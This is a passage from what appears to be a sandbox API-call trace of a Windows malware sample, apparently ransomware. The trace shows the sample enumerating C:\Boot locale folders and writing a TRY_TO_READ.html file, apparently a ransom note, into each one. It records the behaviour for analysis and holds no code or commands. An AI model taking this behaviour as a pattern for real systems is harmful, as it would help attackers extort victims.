	[0051.871] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5580 | out: hHeap=0x540000) returned 1
	[0051.871] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1
	[0051.871] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.871] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.871] GetLastError () returned 0x0
	[0051.871] SetLastError (dwErrCode=0x0) 
	[0051.871] GetLastError () returned 0x0
	[0051.871] SetLastError (dwErrCode=0x0) 
	[0051.871] GetLastError () returned 0x0
	[0051.871] SetLastError (dwErrCode=0x0) 
	[0051.871] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5580
	[0051.871] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a55a8
	[0051.871] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a55d0
	[0051.871] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.871] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.871] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.871] GetLastError () returned 0x0
	[0051.871] SetLastError (dwErrCode=0x0) 
	[0051.871] GetLastError () returned 0x0
	[0051.871] SetLastError (dwErrCode=0x0) 
	[0051.871] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.871] CreateFileW (lpFileName="C:\\\\Boot\\ko-KR\\TRY_TO_READ.html" (normalized: "c:\\boot\\ko-kr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.874] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.874] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.875] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.875] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.875] CloseHandle (hObject=0x3c4) returned 1
	[0051.875] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.875] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.875] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.875] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a55d0 | out: hHeap=0x540000) returned 1
	[0051.875] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1
	[0051.875] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.875] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.875] GetLastError () returned 0x0
	[0051.875] SetLastError (dwErrCode=0x0) 
	[0051.875] GetLastError () returned 0x0
	[0051.875] SetLastError (dwErrCode=0x0) 
	[0051.875] GetLastError () returned 0x0
	[0051.876] SetLastError (dwErrCode=0x0) 
	[0051.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a55d0
	[0051.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583aa0
	[0051.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.876] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.876] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583aa0 | out: hHeap=0x540000) returned 1
	[0051.876] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a55d0 | out: hHeap=0x540000) returned 1
	[0051.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583aa0
	[0051.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x18) returned 0x598250
	[0051.876] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1
	[0051.876] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.876] GetLastError () returned 0x0
	[0051.876] SetLastError (dwErrCode=0x0) 
	[0051.876] GetLastError () returned 0x0
	[0051.876] SetLastError (dwErrCode=0x0) 
	[0051.876] GetLastError () returned 0x0
	[0051.876] SetLastError (dwErrCode=0x0) 
	[0051.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a55d0
	[0051.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a55f8
	[0051.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5620
	[0051.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.876] GetLastError () returned 0x0
	[0051.876] SetLastError (dwErrCode=0x0) 
	[0051.876] GetLastError () returned 0x0
	[0051.876] SetLastError (dwErrCode=0x0) 
	[0051.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.877] CreateFileW (lpFileName="C:\\\\Boot\\nb-NO\\TRY_TO_READ.html" (normalized: "c:\\boot\\nb-no\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.877] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.877] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.878] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.878] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.878] CloseHandle (hObject=0x3c4) returned 1
	[0051.878] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.878] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.878] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.878] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5620 | out: hHeap=0x540000) returned 1
	[0051.878] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1
	[0051.878] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.878] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.878] GetLastError () returned 0x0
	[0051.878] SetLastError (dwErrCode=0x0) 
	[0051.878] GetLastError () returned 0x0
	[0051.878] SetLastError (dwErrCode=0x0) 
	[0051.878] GetLastError () returned 0x0
	[0051.878] SetLastError (dwErrCode=0x0) 
	[0051.878] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5620
	[0051.878] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5648
	[0051.879] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5670
	[0051.879] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.879] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.879] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.879] GetLastError () returned 0x0
	[0051.879] SetLastError (dwErrCode=0x0) 
	[0051.879] GetLastError () returned 0x0
	[0051.879] SetLastError (dwErrCode=0x0) 
	[0051.879] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.879] CreateFileW (lpFileName="C:\\\\Boot\\nl-NL\\TRY_TO_READ.html" (normalized: "c:\\boot\\nl-nl\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.880] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.880] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.881] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.881] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.881] CloseHandle (hObject=0x3c4) returned 1
	[0051.881] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.881] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.881] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.881] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5670 | out: hHeap=0x540000) returned 1
	[0051.881] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1
	[0051.881] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.881] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.881] GetLastError () returned 0x0
	[0051.881] SetLastError (dwErrCode=0x0) 
	[0051.881] GetLastError () returned 0x0
	[0051.881] SetLastError (dwErrCode=0x0) 
	[0051.881] GetLastError () returned 0x0
	[0051.881] SetLastError (dwErrCode=0x0) 
	[0051.881] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5670
	[0051.881] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5698
	[0051.881] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a56c0
	[0051.881] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.882] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.882] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.882] GetLastError () returned 0x0
	[0051.882] SetLastError (dwErrCode=0x0) 
	[0051.882] GetLastError () returned 0x0
	[0051.882] SetLastError (dwErrCode=0x0) 
	[0051.882] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.882] CreateFileW (lpFileName="C:\\\\Boot\\pl-PL\\TRY_TO_READ.html" (normalized: "c:\\boot\\pl-pl\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.882] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.882] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.883] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.883] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.883] CloseHandle (hObject=0x3c4) returned 1
	[0051.883] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.883] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.883] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.883] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a56c0 | out: hHeap=0x540000) returned 1
	[0051.883] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1
	[0051.883] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.883] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.884] GetLastError () returned 0x0
	[0051.884] SetLastError (dwErrCode=0x0) 
	[0051.884] GetLastError () returned 0x0
	[0051.884] SetLastError (dwErrCode=0x0) 
	[0051.884] GetLastError () returned 0x0
	[0051.884] SetLastError (dwErrCode=0x0) 
	[0051.884] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a56c0
	[0051.884] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a56e8
	[0051.884] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5710
	[0051.884] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.884] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.884] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.884] GetLastError () returned 0x0
	[0051.884] SetLastError (dwErrCode=0x0) 
	[0051.884] GetLastError () returned 0x0
	[0051.884] SetLastError (dwErrCode=0x0) 
	[0051.884] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.884] CreateFileW (lpFileName="C:\\\\Boot\\pt-BR\\TRY_TO_READ.html" (normalized: "c:\\boot\\pt-br\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.887] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.887] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.887] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.888] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.888] CloseHandle (hObject=0x3c4) returned 1
	[0051.888] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.888] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.888] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.888] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5710 | out: hHeap=0x540000) returned 1
	[0051.888] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1
	[0051.888] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.888] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.888] GetLastError () returned 0x0
	[0051.888] SetLastError (dwErrCode=0x0) 
	[0051.888] GetLastError () returned 0x0
	[0051.888] SetLastError (dwErrCode=0x0) 
	[0051.888] GetLastError () returned 0x0
	[0051.888] SetLastError (dwErrCode=0x0) 
	[0051.888] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5710
	[0051.888] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5738
	[0051.888] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5760
	[0051.888] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.888] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.888] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.889] GetLastError () returned 0x0
	[0051.889] SetLastError (dwErrCode=0x0) 
	[0051.889] GetLastError () returned 0x0
	[0051.889] SetLastError (dwErrCode=0x0) 
	[0051.889] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.889] CreateFileW (lpFileName="C:\\\\Boot\\pt-PT\\TRY_TO_READ.html" (normalized: "c:\\boot\\pt-pt\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.889] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.889] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.890] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.890] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.890] CloseHandle (hObject=0x3c4) returned 1
	[0051.890] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.890] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.890] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.890] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5760 | out: hHeap=0x540000) returned 1
	[0051.890] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1
	[0051.890] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.890] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.890] GetLastError () returned 0x0
	[0051.890] SetLastError (dwErrCode=0x0) 
	[0051.890] GetLastError () returned 0x0
	[0051.891] SetLastError (dwErrCode=0x0) 
	[0051.891] GetLastError () returned 0x0
	[0051.891] SetLastError (dwErrCode=0x0) 
	[0051.891] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5760
	[0051.891] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5788
	[0051.891] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a57b0
	[0051.891] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.891] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.891] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.891] GetLastError () returned 0x0
	[0051.891] SetLastError (dwErrCode=0x0) 
	[0051.891] GetLastError () returned 0x0
	[0051.891] SetLastError (dwErrCode=0x0) 
	[0051.891] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.891] CreateFileW (lpFileName="C:\\\\Boot\\ru-RU\\TRY_TO_READ.html" (normalized: "c:\\boot\\ru-ru\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.892] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.892] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.893] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
